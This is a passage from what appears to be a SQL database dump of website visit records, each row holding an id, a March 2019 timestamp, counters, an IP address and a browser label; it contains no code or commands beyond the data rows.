,1,0,0,'157.55.39.120','other'),(400224,1552708545,1,1,0,0,'66.249.66.136','chrome'),(400225,1552709156,1,1,0,0,'66.249.66.134','chrome'),(400226,1552709293,1,1,0,0,'46.229.168.140','other'),(400227,1552709485,1,1,0,0,'37.9.113.20','other'),(400228,1552709572,1,1,0,0,'213.180.203.40','other'),(400229,1552709779,3,3,0,0,'5.45.207.79','other'),(400230,1552710766,1,1,0,0,'5.255.253.22','other'),(400231,1552711823,1,1,0,0,'46.229.168.132','other'),(400232,1552712337,1,1,0,0,'40.77.167.162','other'),(400233,1552712508,1,1,0,0,'207.46.13.141','other'),(400234,1552712759,1,1,0,0,'207.46.13.130','other'),(400235,1552714039,1,1,0,0,'207.46.13.131','other'),(400236,1552714172,1,1,0,0,'207.46.13.167','other'),(400237,1552714238,1,1,0,0,'46.229.168.142','other'),(400238,1552714250,1,1,0,0,'207.46.13.130','other'),(400239,1552714426,1,1,0,0,'5.45.207.79','other'),(400240,1552714591,1,1,0,0,'8.29.198.25','other'),(400241,1552714615,1,1,0,0,'8.29.198.27','other'),(400242,1552714681,1,1,0,0,'180.76.15.31','other'),(400243,1552715207,1,1,0,0,'46.229.168.130','other'),(400244,1552716704,1,1,0,0,'207.46.13.206','other'),(400245,1552716977,2,2,0,0,'216.244.66.241','other'),(400246,1552717229,1,1,0,0,'207.46.13.131','other'),(400247,1552717301,3,3,0,0,'157.55.39.156','other'),(400248,1552717353,1,1,0,0,'66.249.66.134','chrome'),(400249,1552717547,2,2,0,0,'207.46.13.40','other'),(400250,1552717560,1,1,0,0,'185.220.100.253','other'),(400251,1552717983,1,1,0,0,'207.46.13.206','other'),(400252,1552718467,1,1,0,0,'207.46.13.131','other'),(400253,1552718539,1,1,0,0,'109.201.138.234','other'),(400254,1552718668,1,1,0,0,'46.229.168.140','other'),(400255,1552719853,2,2,0,0,'178.154.244.11','other'),(400256,1552720042,1,1,0,0,'178.154.200.48','other'),(400257,1552720112,1,1,0,0,'46.229.168.140','other'),(400258,1552720148,3,3,0,0,'141.8.142.103','other'),(400259,1552720522,2,2,0,0,'5.45.207.79','other'),(400260,1552720574,2,2,0,0,'87.250.224.47','other'),(400261,1552720841,1,1,0,0,'37.9.113.20','other'),(400262,1552720880,4,4,0,0,'178.154.244.11','other'),(400263,1552721034,1,1,0,0,'5.45.207.19','other'),(400264,1552721140,1,1,0,0,'157.55.39.156','other'),(400265,1552721500,1,1,0,0,'91.217.91.13','firefox'),(400266,1552721712,1,1,0,0,'66.249.66.136','chrome'),(400267,1552721832,1,1,0,0,'176.113.170.104','chrome'),(400268,1552722613,1,1,0,0,'94.179.247.49','chrome'),(400269,1552722620,2,2,0,0,'46.96.33.130','chrome'),(400270,1552722878,1,1,0,0,'46.229.168.148','other'),(400271,1552722992,1,1,0,0,'46.229.168.144','other'),(400272,1552723063,1,1,0,0,'66.249.66.134','chrome'),(400273,1552723379,1,1,0,0,'207.46.13.40','other'),(400274,1552723877,1,1,0,0,'91.196.178.46','chrome'),(400275,1552724392,1,1,0,0,'91.196.178.102','chrome'),(400276,1552725124,1,1,0,0,'91.196.178.76','firefox'),(400277,1552725431,2,2,0,0,'8.29.198.26','other'),(400278,1552725513,1,1,0,0,'46.96.47.213','chrome'),(400279,1552725520,4,4,0,0,'66.249.83.200','chrome'),(400280,1552725538,1,1,0,0,'66.249.83.198','chrome'),(400281,1552725981,1,1,0,0,'66.249.66.58','chrome'),(400282,1552726015,1,1,0,0,'207.46.13.206','other'),(400283,1552727609,1,1,0,0,'46.229.168.146','other'),(400284,1552728197,2,2,0,0,'66.249.66.138','chrome'),(400285,1552728210,1,1,0,0,'5.196.87.173','other'),(400286,1552728867,1,1,0,0,'46.211.96.80','chrome'),(400287,1552728948,1,1,0,0,'5.45.207.19','other'),(400288,1552728989,3,3,0,0,'141.8.142.103','other'),(400289,1552729089,1,1,0,0,'178.154.244.11','other'),(400290,1552729257,1,1,0,0,'87.250.224.65','other'),(400291,1552729304,1,1,0,0,'95.108.213.4','other'),(400292,1552729308,1,1,0,0,'46.229.168.137','other'),(400293,1552729505,1,1,0,0,'46.229.168.151','other'),(400294,1552729599,1,1,0,0,'207.46.13.40','other'),(400295,1552729718,1,1,0,0,'5.45.207.79','other'),(400296,1552730121,1,1,0,0,'213.180.203.9','other'),(400297,1552730161,1,1,0,0,'37.9.113.103','other'),(400298,1552730221,2,2,0,0,'66.249.66.138','chrome'),(400299,1552730259,1,1,0,0,'66.249.66.136','chrome'),(400300,1552730516,1,1,0,0,'66.249.66.134','chrome'),(400301,1552730751,1,1,0,0,'91.196.178.67','chrome'),(400302,1552730768,1,1,0,0,'178.154.244.11','other'),(400303,1552731376,1,1,0,0,'46.96.50.187','chrome'),(400304,1552731847,1,1,0,0,'46.229.168.143','other'),(400305,1552731848,2,2,0,0,'66.249.66.136','chrome'),(400306,1552732407,1,1,0,0,'66.249.66.60','chrome'),(400307,1552732994,1,1,0,0,'157.55.39.226','other'),(400308,1552734611,2,2,0,0,'40.77.167.125','other'),(400309,1552734709,1,1,0,0,'40.77.167.134','other'),(400310,1552734925,1,1,0,0,'180.76.15.145','other'),(400311,1552734998,1,1,0,0,'46.229.168.139','other'),(400312,1552735114,1,1,0,0,'13.57.233.99','chrome'),(400313,1552735409,1,1,0,0,'40.77.167.81','other'),(400314,1552735991,1,1,0,0,'66.249.66.138','chrome'),(400315,1552736277,2,2,0,0,'8.29.198.25','other'),(400316,1552736496,1,1,0,0,'40.77.167.125','other'),(400317,1552736866,1,1,0,0,'66.249.66.134','chrome'),(400318,1552736989,2,2,0,0,'66.249.66.138','chrome'),(400319,1552737778,1,1,0,0,'66.249.66.136','chrome'),(400320,1552737935,1,1,0,0,'5.45.207.79','other'),(400321,1552738069,1,1,0,0,'95.108.213.4','other'),(400322,1552738220,1,1,0,0,'216.244.66.241','other'),(400323,1552738228,1,1,0,0,'46.229.168.150','other'),(400324,1552738491,1,1,0,0,'66.249.66.138','chrome'),(400325,1552738529,1,1,0,0,'46.229.168.138','other'),(400326,1552739661,1,1,0,0,'66.249.66.58','chrome'),(400327,1552739974,1,1,0,0,'40.77.167.150','other'),(400328,1552740033,1,1,0,0,'213.180.203.40','other'),(400329,1552740241,1,1,0,0,'91.196.178.76','chrome'),(400330,1552740264,1,1,0,0,'46.166.137.207','other'),(400331,1552741129,1,1,0,0,'46.229.168.137','other'),(400332,1552741247,1,1,0,0,'66.249.66.134','chrome'),(400333,1552741729,1,1,0,0,'46.229.168.144','other'),(400334,1552742067,1,1,0,0,'46.229.168.134','other'),(400335,1552742421,1,1,0,0,'46.229.168.142','other'),(400336,1552742491,1,1,0,0,'52.53.201.78','chrome'),(400337,1552742750,1,1,0,0,'5.196.87.172','other'),(400338,1552743020,3,3,0,0,'66.249.66.134','chrome'),(400339,1552743092,1,1,0,0,'46.229.168.134','other'),(400340,1552743618,1,1,0,0,'46.229.168.129','other'),(400341,1552743697,1,1,0,0,'46.229.168.135','other'),(400342,1552744302,1,1,0,0,'40.77.167.124','other'),(400343,1552744689,1,1,0,0,'37.115.186.35','chrome'),(400344,1552744798,1,1,0,0,'66.249.66.138','chrome'),(400345,1552745365,1,1,0,0,'40.77.167.222','other'),(400346,1552745373,1,1,0,0,'46.229.168.133','other'),(400347,1552746775,1,1,0,0,'66.249.66.136','chrome'),(400348,1552746889,1,1,0,0,'207.46.13.122','other'),(400349,1552747111,1,1,0,0,'8.29.198.26','other'),(400350,1552747133,1,1,0,0,'8.29.198.25','other'),(400351,1552747160,1,1,0,0,'5.45.207.19','other'),(400352,1552747271,2,2,0,0,'213.180.203.40','other'),(400353,1552747589,1,1,0,0,'46.229.168.138','other'),(400354,1552747720,1,1,0,0,'37.52.175.209','chrome'),(400355,1552748097,1,1,0,0,'141.8.132.16','other'),(400356,1552748156,1,1,0,0,'213.180.203.48','other'),(400357,1552748219,1,1,0,0,'141.8.142.103','other'),(400358,1552748391,1,1,0,0,'5.45.207.80','other'),(400359,1552748395,1,1,0,0,'95.108.213.4','other'),(400360,1552748413,1,1,0,0,'37.9.113.103','other'),(400361,1552748555,1,1,0,0,'95.108.181.83','other'),(400362,1552748558,1,1,0,0,'178.154.200.48','other'),(400363,1552748563,1,1,0,0,'40.77.167.124','other'),(400364,1552748644,1,1,0,0,'46.229.168.149','other'),(400365,1552748829,1,1,0,0,'66.249.66.138','chrome'),(400366,1552748898,1,1,0,0,'46.229.168.147','other'),(400367,1552749251,1,1,0,0,'5.45.207.79','other'),(400368,1552749766,1,1,0,0,'46.229.168.133','other'),(400369,1552750603,1,1,0,0,'209.17.97.42','other'),(400370,1552750678,1,1,0,0,'46.229.168.142','other'),(400371,1552751052,1,1,0,0,'130.180.217.226','chrome'),(400372,1552751180,1,1,0,0,'5.196.87.172','other'),(400373,1552752611,1,1,0,0,'46.229.168.144','other'),(400374,1552752914,1,1,0,0,'180.76.15.8','other'),(400375,1552753208,1,1,0,0,'66.249.66.62','chrome'),(400376,1552753272,1,1,0,0,'157.55.39.150','other'),(400377,1552753781,2,2,0,0,'46.229.168.139','other'),(400378,1552753815,1,1,0,0,'46.229.168.151','other'),(400379,1552753892,1,1,0,0,'66.249.66.136','chrome'),(400380,1552754914,1,1,0,0,'180.76.15.136','other'),(400381,1552755463,1,1,0,0,'213.180.203.40','other'),(400382,1552755535,1,1,0,0,'157.55.39.150','other'),(400383,1552755888,1,1,0,0,'178.154.171.17','other'),(400384,1552755971,3,3,0,0,'178.154.244.11','other'),(400385,1552756137,1,1,0,0,'5.45.207.79','other'),(400386,1552756317,1,1,0,0,'141.8.183.22','other'),(400387,1552756445,2,2,0,0,'141.8.142.103','other'),(400388,1552756465,2,2,0,0,'93.158.166.7','other'),(400389,1552756967,1,1,0,0,'54.36.148.153','other'),(400390,1552756973,1,1,0,0,'5.196.87.174','other'),(400391,1552757199,1,1,0,0,'95.108.181.57','other'),(400392,1552757312,1,1,0,0,'178.154.244.49','other'),(400393,1552757342,1,1,0,0,'213.180.203.53','other'),(400394,1552757417,1,1,0,0,'213.180.203.17','other'),(400395,1552757637,1,1,0,0,'66.249.66.134','chrome'),(400396,1552757666,1,1,0,0,'66.249.66.138','chrome'),(400397,1552757841,1,1,0,0,'54.36.148.243','other'),(400398,1552757946,2,2,0,0,'8.29.198.26','other'),(400399,1552758552,1,1,0,0,'54.36.150.80','other'),(400400,1552758644,1,1,0,0,'141.8.142.103','other'),(400401,1552758720,1,1,0,0,'157.55.39.150','other'),(400402,1552758752,1,1,0,0,'54.36.148.25','other'),(400403,1552758805,1,1,0,0,'178.154.244.11','other'),(400404,1552758946,1,1,0,0,'95.108.213.4','other'),(400405,1552759061,1,1,0,0,'54.36.150.16','other'),(400406,1552759103,1,1,0,0,'54.36.149.21','other'),(400407,1552759186,1,1,0,0,'54.36.150.121','other'),(400408,1552759335,1,1,0,0,'54.36.148.215','other'),(400409,1552759535,1,1,0,0,'54.36.150.52','other'),(400410,1552759885,1,1,0,0,'46.229.168.136','other'),(400411,1552759965,1,1,0,0,'54.36.148.158','other'),(400412,1552760585,1,1,0,0,'46.229.168.130','other'),(400413,1552760683,1,1,0,0,'46.229.168.138','other'),(400414,1552760977,1,1,0,0,'46.229.168.133','other'),(400415,1552761121,1,1,0,0,'54.36.149.103','other'),(400416,1552761247,1,1,0,0,'54.36.149.29','other'),(400417,1552761392,1,1,0,0,'54.36.150.86','other'),(400418,1552761497,2,2,0,0,'66.249.66.136','chrome'),(400419,1552761706,1,1,0,0,'46.229.168.135','other'),(400420,1552761721,1,1,0,0,'54.36.148.194','other'),(400421,1552761752,1,1,0,0,'40.77.167.51','other'),(400422,1552761994,1,1,0,0,'54.36.150.169','other'),(400423,1552762045,1,1,0,0,'216.244.66.241','other'),(400424,1552762130,1,1,0,0,'54.36.150.148','other'),(400425,1552762181,2,2,0,0,'178.154.244.11','other'),(400426,1552762388,1,1,0,0,'157.55.39.150','other'),(400427,1552762431,1,1,0,0,'54.36.148.118','other'),(400428,1552762473,1,1,0,0,'5.45.207.19','other'),(400429,1552762542,1,1,0,0,'66.249.66.58','chrome'),(400430,1552762657,1,1,0,0,'54.36.148.28','other'),(400431,1552762673,1,1,0,0,'54.36.150.125','other'),(400432,1552762811,1,1,0,0,'92.112.249.202','chrome'),(400433,1552763280,1,1,0,0,'46.229.168.152','other'),(400434,1552763692,1,1,0,0,'54.36.148.161','other'),(400435,1552764165,1,1,0,0,'54.36.150.68','other'),(400436,1552764267,1,1,0,0,'54.36.150.33','other'),(400437,1552764929,1,1,0,0,'157.55.39.150','other'),(400438,1552765092,1,1,0,0,'46.229.168.138','other'),(400439,1552765146,1,1,0,0,'66.249.66.138','chrome'),(400440,1552765163,1,1,0,0,'54.36.148.8','other'),(400441,1552765172,1,1,0,0,'51.255.65.46','other'),(400442,1552765174,1,1,0,0,'54.36.149.7','other'),(400443,1552765477,1,1,0,0,'46.229.168.146','other'),(400444,1552765489,1,1,0,0,'141.8.142.103','other'),(400445,1552765569,1,1,0,0,'54.36.150.145','other'),(400446,1552765644,1,1,0,0,'54.36.148.252','other'),(400447,1552766830,1,1,0,0,'54.36.148.181','other'),(400448,1552767005,1,1,0,0,'40.77.167.51','other'),(400449,1552767185,1,1,0,0,'157.55.39.62','other'),(400450,1552767244,1,1,0,0,'54.36.148.64','other'),(400451,1552767266,1,1,0,0,'66.249.66.136','chrome'),(400452,1552767856,1,1,0,0,'66.249.66.134','chrome'),(400453,1552768003,1,1,0,0,'54.36.150.35','other'),(400454,1552768574,1,1,0,0,'46.149.186.19','chrome'),(400455,1552768781,1,1,0,0,'8.29.198.27','other'),(400456,1552768826,1,1,0,0,'8.29.198.26','other'),(400457,1552768874,1,1,0,0,'46.229.168.145','other'),(400458,1552768973,1,1,0,0,'54.36.148.199','other'),(400459,1552769067,1,1,0,0,'54.36.148.204','other'),(400460,1552769774,1,1,0,0,'54.36.150.12','other'),(400461,1552770147,1,1,0,0,'54.36.150.67','other'),(400462,1552770173,1,1,0,0,'157.55.39.165','other'),(400463,1552770198,1,1,0,0,'54.36.150.26','other'),(400464,1552770355,1,1,0,0,'66.249.66.138','chrome'),(400465,1552770376,1,1,0,0,'54.36.148.241','other'),(400466,1552770493,1,1,0,0,'54.36.150.59','other'),(400467,1552770801,1,1,0,0,'46.229.168.149','other'),(400468,1552771120,1,1,0,0,'54.36.148.77','other'),(400469,1552771372,1,1,0,0,'54.36.149.97','other'),(400470,1552771892,1,1,0,0,'54.36.150.79','other'),(400471,1552771915,1,1,0,0,'66.249.66.60','chrome'),(400472,1552772564,1,1,0,0,'207.46.13.204','other'),(400473,1552772754,1,1,0,0,'46.229.168.135','other'),(400474,1552772954,1,1,0,0,'46.229.168.142','other'),(400475,1552773108,1,1,0,0,'54.36.149.105','other'),(400476,1552773426,1,1,0,0,'66.249.66.136','chrome'),(400477,1552774304,1,1,0,0,'54.36.148.79','other'),(400478,1552774537,1,1,0,0,'5.196.87.175','other'),(400479,1552774595,1,1,0,0,'5.196.87.174','other'),(400480,1552774734,1,1,0,0,'46.229.168.134','other'),(400481,1552774741,1,1,0,0,'157.55.39.62','other'),(400482,1552774814,1,1,0,0,'66.249.66.138','chrome'),(400483,1552774938,1,1,0,0,'216.244.66.241','other'),(400484,1552775076,1,1,0,0,'46.229.168.142','other'),(400485,1552775258,1,1,0,0,'54.36.148.112','other'),(400486,1552775443,1,1,0,0,'157.55.39.165','other'),(400487,1552775445,1,1,0,0,'178.154.244.11','other'),(400488,1552775450,1,1,0,0,'46.229.168.150','other'),(400489,1552775750,1,1,0,0,'54.36.148.166','other'),(400490,1552775818,2,2,0,0,'5.45.207.19','other'),(400491,1552775839,1,1,0,0,'5.45.207.79','other'),(400492,1552775850,2,2,0,0,'95.108.213.4','other'),(400493,1552775955,1,1,0,0,'66.249.66.138','chrome'),(400494,1552776585,1,1,0,0,'54.36.148.15','other'),(400495,1552777061,1,1,0,0,'5.45.207.19','other'),(400496,1552777328,1,1,0,0,'213.180.203.9','other'),(400497,1552777365,1,1,0,0,'37.9.113.20','other'),(400498,1552777418,1,1,0,0,'66.249.66.134','chrome'),(400499,1552778327,1,1,0,0,'157.55.39.62','other'),(400500,1552778788,2,2,0,0,'157.55.39.165','other'),(400501,1552778962,1,1,0,0,'46.229.168.136','other'),(400502,1552779618,2,2,0,0,'8.29.198.27','other'),(400503,1552780245,1,1,0,0,'54.36.148.134','other'),(400504,1552780522,1,1,0,0,'54.36.149.23','other'),(400505,1552780630,2,2,0,0,'216.244.66.241','other'),(400506,1552780835,1,1,0,0,'66.249.66.138','chrome'),(400507,1552780913,1,1,0,0,'66.249.66.58','chrome'),(400508,1552780991,1,1,0,0,'54.36.148.232','other'),(400509,1552780997,1,1,0,0,'66.249.66.136','chrome'),(400510,1552781213,1,1,0,0,'180.76.15.151','other'),(400511,1552782058,1,1,0,0,'54.36.148.19','other'),(400512,1552782458,1,1,0,0,'54.36.149.50','other'),(400513,1552782837,1,1,0,0,'54.36.148.187','other'),(400514,1552782932,1,1,0,0,'66.249.66.138','chrome'),(400515,1552783012,1,1,0,0,'54.36.148.49','other'),(400516,1552783158,1,1,0,0,'54.36.148.77','other'),(400517,1552783169,1,1,0,0,'66.249.66.60','chrome'),(400518,1552783243,1,1,0,0,'54.36.150.141','other'),(400519,1552783285,1,1,0,0,'66.249.66.58','chrome'),(400520,1552783373,1,1,0,0,'46.229.168.138','other'),(400521,1552783410,2,2,0,0,'216.244.66.241','other'),(400522,1552783484,1,1,0,0,'46.229.168.139','other'),(400523,1552783688,1,1,0,0,'54.36.148.140','other'),(400524,1552784240,1,1,0,0,'54.36.150.178','other'),(400525,1552784386,1,1,0,0,'66.249.66.138','chrome'),(400526,1552784661,1,1,0,0,'54.36.149.42','other'),(400527,1552784708,1,1,0,0,'54.36.150.119','other'),(400528,1552784820,1,1,0,0,'54.36.150.10','other'),(400529,1552784916,1,1,0,0,'46.229.168.135','other'),(400530,1552784967,1,1,0,0,'5.45.207.79','other'),(400531,1552785008,1,1,0,0,'46.229.168.141','other'),(400532,1552785050,2,2,0,0,'157.55.39.212','other'),(400533,1552785053,2,2,0,0,'5.45.207.19','other'),(400534,1552785103,1,1,0,0,'54.36.148.107','other'),(400535,1552785565,1,1,0,0,'54.36.148.42','other'),(400536,1552785800,1,1,0,0,'178.154.244.11','other'),(400537,1552786082,1,1,0,0,'54.36.148.198','other'),(400538,1552786109,1,1,0,0,'207.46.13.156','other'),(400539,1552786133,1,1,0,0,'46.229.168.140','other'),(400540,1552786183,1,1,0,0,'54.36.150.94','other'),(400541,1552786773,1,1,0,0,'54.36.150.176','other'),(400542,1552786818,1,1,0,0,'157.55.39.212','other'),(400543,1552787926,1,1,0,0,'54.36.148.151','other'),(400544,1552788382,1,1,0,0,'54.36.148.137','other'),(400545,1552788715,1,1,0,0,'54.36.150.34','other'),(400546,1552789531,1,1,0,0,'54.36.148.133','other'),(400547,1552789720,4,4,0,0,'178.154.244.11','other'),(400548,1552789780,1,1,0,0,'5.45.207.19','other'),(400549,1552790087,1,1,0,0,'37.9.113.148','other'),(400550,1552790121,1,1,0,0,'95.108.213.4','other'),(400551,1552790228,2,2,0,0,'207.46.13.155','other'),(400552,1552790308,1,1,0,0,'141.8.142.103','other'),(400553,1552790454,2,2,0,0,'8.29.198.26','other'),(400554,1552790550,1,1,0,0,'54.36.149.16','other'),(400555,1552790970,1,1,0,0,'54.36.148.138','other'),(400556,1552790990,1,1,0,0,'54.36.148.142','other'),(400557,1552791078,1,1,0,0,'54.36.149.73','other'),(400558,1552791359,1,1,0,0,'5.45.207.79','other'),(400559,1552791557,1,1,0,0,'54.36.150.26','other'),(400560,1552791634,1,1,0,0,'54.36.148.175','other'),(400561,1552792159,1,1,0,0,'54.36.149.17','other'),(400562,1552792572,1,1,0,0,'54.36.148.5','other'),(400563,1552792699,1,1,0,0,'54.36.150.88','other'),(400564,1552793244,1,1,0,0,'5.45.207.19','other'),(400565,1552793409,1,1,0,0,'46.229.168.149','other'),(400566,1552793921,1,1,0,0,'216.244.66.241','other'),(400567,1552794415,1,1,0,0,'54.36.149.33','other'),(400568,1552794548,1,1,0,0,'207.46.13.155','other'),(400569,1552794971,1,1,0,0,'54.36.150.82','other'),(400570,1552795062,1,1,0,0,'54.36.149.60','other'),(400571,1552795468,1,1,0,0,'54.36.148.222','other'),(400572,1552795474,1,1,0,0,'54.36.148.17','other'),(400573,1552795520,2,2,0,0,'5.45.207.19','other'),(400574,1552795588,1,1,0,0,'54.36.150.68','other'),(400575,1552795663,1,1,0,0,'178.154.244.11','other'),(400576,1552795755,1,1,0,0,'37.9.113.148','other'),(400577,1552795833,1,1,0,0,'54.36.148.224','other'),(400578,1552795901,2,2,0,0,'5.45.207.79','other'),(400579,1552796019,1,1,0,0,'207.46.13.155','other'),(400580,1552796173,1,1,0,0,'40.77.167.108','other'),(400581,1552796309,1,1,0,0,'54.36.148.164','other'),(400582,1552796386,1,1,0,0,'54.36.149.76','other'),(400583,1552796475,1,1,0,0,'54.36.150.159','other'),(400584,1552796542,1,1,0,0,'54.36.150.165','other'),(400585,1552796593,1,1,0,0,'54.36.148.103','other'),(400586,1552796670,1,1,0,0,'216.244.66.241','other'),(400587,1552796862,1,1,0,0,'46.229.168.140','other'),(400588,1552797216,1,1,0,0,'54.36.150.75','other'),(400589,1552797677,1,1,0,0,'54.36.148.13','other'),(400590,1552797884,1,1,0,0,'91.196.178.136','firefox'),(400591,1552798233,1,1,0,0,'5.45.207.79','other'),(400592,1552798490,1,1,0,0,'46.229.168.142','other'),(400593,1552798713,1,1,0,0,'54.36.148.137','other'),(400594,1552798842,1,1,0,0,'207.46.13.155','other'),(400595,1552798912,1,1,0,0,'54.36.148.203','other'),(400596,1552799045,1,1,0,0,'95.163.255.46','other'),(400597,1552799592,1,1,0,0,'54.36.148.40','other'),(400598,1552800227,1,1,0,0,'213.180.203.9','other'),(400599,1552800548,1,1,0,0,'54.36.150.54','other'),(400600,1552800844,1,1,0,0,'207.46.13.155','other'),(400601,1552800908,1,1,0,0,'46.229.168.140','other'),(400602,1552801126,2,2,0,0,'34.220.230.191','chrome'),(400603,1552801290,2,2,0,0,'8.29.198.27','other'),(400604,1552801460,1,1,0,0,'54.36.149.15','other'),(400605,1552801671,1,1,0,0,'176.113.170.104','chrome'),(400606,1552802243,1,1,0,0,'46.229.168.130','other'),(400607,1552802264,1,1,0,0,'54.36.148.39','other'),(400608,1552802593,1,1,0,0,'37.9.113.20','other'),(400609,1552802662,2,2,0,0,'37.9.113.148','other'),(400610,1552802670,1,1,0,0,'87.250.224.81','other'),(400611,1552802826,1,1,0,0,'95.108.181.75','other'),(400612,1552802960,3,3,0,0,'95.108.213.4','other'),(400613,1552803017,2,2,0,0,'178.154.244.11','other'),(400614,1552803155,1,1,0,0,'178.154.171.27','other'),(400615,1552803157,1,1,0,0,'213.180.203.17','other'),(400616,1552803175,1,1,0,0,'5.45.207.19','other'),(400617,1552803199,1,1,0,0,'213.180.203.40','other'),(400618,1552803846,1,1,0,0,'213.180.203.9','other'),(400619,1552804123,1,1,0,0,'54.36.150.42','other'),(400620,1552804338,1,1,0,0,'185.220.101.60','other'),(400621,1552804525,1,1,0,0,'216.244.66.241','other'),(400622,1552805039,1,1,0,0,'178.154.244.11','other'),(400623,1552805607,1,1,0,0,'54.36.149.35','other'),(400624,1552806140,1,1,0,0,'54.36.148.148','other'),(400625,1552806386,1,1,0,0,'46.229.168.149','other'),(400626,1552806625,1,1,0,0,'66.249.66.134','chrome'),(400627,1552806707,1,1,0,0,'66.249.66.136','chrome'),(400628,1552807000,1,1,0,0,'207.46.13.155','other'),(400629,1552807631,1,1,0,0,'54.36.148.107','other'),(400630,1552807647,1,1,0,0,'54.36.148.121','other'),(400631,1552807678,1,1,0,0,'54.36.148.126','other'),(400632,1552807703,1,1,0,0,'54.36.148.82','other'),(400633,1552808588,1,1,0,0,'91.196.178.180','chrome'),(400634,1552809261,1,1,0,0,'54.36.148.148','other'),(400635,1552809364,1,1,0,0,'54.36.148.100','other'),(400636,1552809498,1,1,0,0,'54.36.149.90','other'),(400637,1552809716,1,1,0,0,'216.244.66.241','other'),(400638,1552810031,1,1,0,0,'46.229.168.142','other'),(400639,1552810344,1,1,0,0,'54.36.149.69','other'),(400640,1552811426,1,1,0,0,'46.229.168.145','other'),(400641,1552811576,1,1,0,0,'128.204.52.254','msie'),(400642,1552811760,1,1,0,0,'54.36.148.253','other'),(400643,1552811826,1,1,0,0,'54.36.150.32','other'),(400644,1552811873,1,1,0,0,'37.9.113.103','other'),(400645,1552811890,3,3,0,0,'141.8.142.103','other'),(400646,1552811911,4,4,0,0,'178.154.244.11','other'),(400647,1552812000,1,1,0,0,'87.250.224.47','other'),(400648,1552812003,1,1,0,0,'54.36.148.236','other'),(400649,1552812122,1,1,0,0,'8.29.198.27','other'),(400650,1552812172,1,1,0,0,'8.29.198.26','other'),(400651,1552812208,1,1,0,0,'54.36.148.21','other'),(400652,1552812262,1,1,0,0,'5.45.207.79','other'),(400653,1552812311,1,1,0,0,'5.45.207.19','other'),(400654,1552812515,1,1,0,0,'54.36.148.15','other'),(400655,1552812518,1,1,0,0,'54.36.148.239','other'),(400656,1552812598,1,1,0,0,'46.229.168.130','other'),(400657,1552813132,2,2,0,0,'178.154.244.11','other'),(400658,1552813411,1,1,0,0,'46.211.97.10','chrome'),(400659,1552813481,1,1,0,0,'54.36.148.146','other'),(400660,1552813661,1,1,0,0,'66.249.66.58','chrome'),(400661,1552813880,1,1,0,0,'46.229.168.150','other'),(400662,1552813980,1,1,0,0,'5.45.207.19','other'),(400663,1552814209,1,1,0,0,'178.154.244.11','other'),(400664,1552814313,1,1,0,0,'180.76.15.150','other'),(400665,1552814540,1,1,0,0,'37.9.113.148','other'),(400666,1552814671,1,1,0,0,'216.244.66.241','other'),(400667,1552814765,1,1,0,0,'46.229.168.133','other'),(400668,1552815020,1,1,0,0,'54.36.148.1','other'),(400669,1552815215,1,1,0,0,'54.36.148.156','other'),(400670,1552815346,1,1,0,0,'46.229.168.139','other'),(400671,1552815457,1,1,0,0,'54.36.148.100','other'),(400672,1552815799,1,1,0,0,'91.196.178.130','chrome'),(400673,1552815883,1,1,0,0,'54.36.148.85','other'),(400674,1552816519,1,1,0,0,'46.229.168.138','other'),(400675,1552816838,2,2,0,0,'66.249.66.134','chrome'),(400676,1552816907,1,1,0,0,'46.229.168.130','other'),(400677,1552816986,1,1,0,0,'46.229.168.147','other'),(400678,1552817081,1,1,0,0,'54.36.150.110','other'),(400679,1552817193,1,1,0,0,'46.229.168.145','other'),(400680,1552817313,1,1,0,0,'40.77.167.48','other'),(400681,1552817417,1,1,0,0,'46.229.168.142','other'),(400682,1552817720,1,1,0,0,'95.163.255.103','other'),(400683,1552817792,1,1,0,0,'54.36.150.123','other'),(400684,1552817975,1,1,0,0,'54.36.150.188','other'),(400685,1552818036,1,1,0,0,'46.229.168.148','other'),(400686,1552818071,1,1,0,0,'66.249.66.138','chrome'),(400687,1552818715,1,1,0,0,'54.36.148.255','other'),(400688,1552818743,1,1,0,0,'207.46.13.164','other'),(400689,1552818997,1,1,0,0,'54.36.148.163','other'),(400690,1552819326,1,1,0,0,'218.30.103.145','other'),(400691,1552819388,1,1,0,0,'54.36.148.9','other'),(400692,1552819408,1,1,0,0,'54.36.150.190','other'),(400693,1552819441,1,1,0,0,'173.212.233.72','chrome'),(400694,1552820091,1,1,0,0,'5.173.241.198','chrome'),(400695,1552820984,1,1,0,0,'46.229.168.130','other'),(400696,1552821686,1,1,0,0,'66.249.66.138','chrome'),(400697,1552821724,1,1,0,0,'91.196.178.8','chrome'),(400698,1552821815,1,1,0,0,'54.36.148.121','other'),(400699,1552821842,1,1,0,0,'207.46.13.5','other'),(400700,1552821888,1,1,0,0,'54.36.148.87','other'),(400701,1552822206,1,1,0,0,'54.36.150.159','other'),(400702,1552822286,1,1,0,0,'54.36.149.69','other'),(400703,1552822952,1,1,0,0,'8.29.198.25','other'),(400704,1552823007,1,1,0,0,'8.29.198.26','other'),(400705,1552823088,1,1,0,0,'5.45.207.79','other'),(400706,1552823101,2,2,0,0,'66.249.66.138','chrome'),(400707,1552823153,2,2,0,0,'40.77.167.48','other'),(400708,1552823183,2,2,0,0,'66.249.66.136','chrome'),(400709,1552823185,1,1,0,0,'213.180.203.9','other'),(400710,1552823543,1,1,0,0,'46.96.45.211','chrome'),(400711,1552823614,1,1,0,0,'141.8.142.103','other'),(400712,1552823908,1,1,0,0,'54.36.148.147','other'),(400713,1552823982,2,2,0,0,'95.108.213.4','other'),(400714,1552824294,1,1,0,0,'54.36.148.102','other'),(400715,1552824632,1,1,0,0,'54.36.149.64','other'),(400716,1552824861,1,1,0,0,'54.36.148.144','other'),(400717,1552825139,1,1,0,0,'66.249.66.134','chrome'),(400718,1552825308,1,1,0,0,'54.36.148.244','other'),(400719,1552825381,1,1,0,0,'157.55.39.118','other'),(400720,1552825417,2,2,0,0,'207.46.13.164','other'),(400721,1552825754,1,1,0,0,'54.36.150.137','other'),(400722,1552825796,1,1,0,0,'54.36.149.65','other'),(400723,1552825938,1,1,0,0,'54.36.148.71','other'),(400724,1552826248,1,1,0,0,'178.154.244.11','other'),(400725,1552826528,1,1,0,0,'54.36.148.6','other'),(400726,1552826743,1,1,0,0,'54.36.148.19','other'),(400727,1552827898,1,0,1,0,'66.249.66.134',''),(400728,1552828013,1,1,0,0,'66.249.66.138','chrome'),(400729,1552828228,1,1,0,0,'54.36.150.99','other'),(400730,1552828783,1,1,0,0,'157.55.39.118','other'),(400731,1552829032,1,1,0,0,'54.36.148.195','other'),(400732,1552829048,2,2,0,0,'66.249.66.138','chrome'),(400733,1552829139,1,1,0,0,'54.36.150.103','other'),(400734,1552830071,1,1,0,0,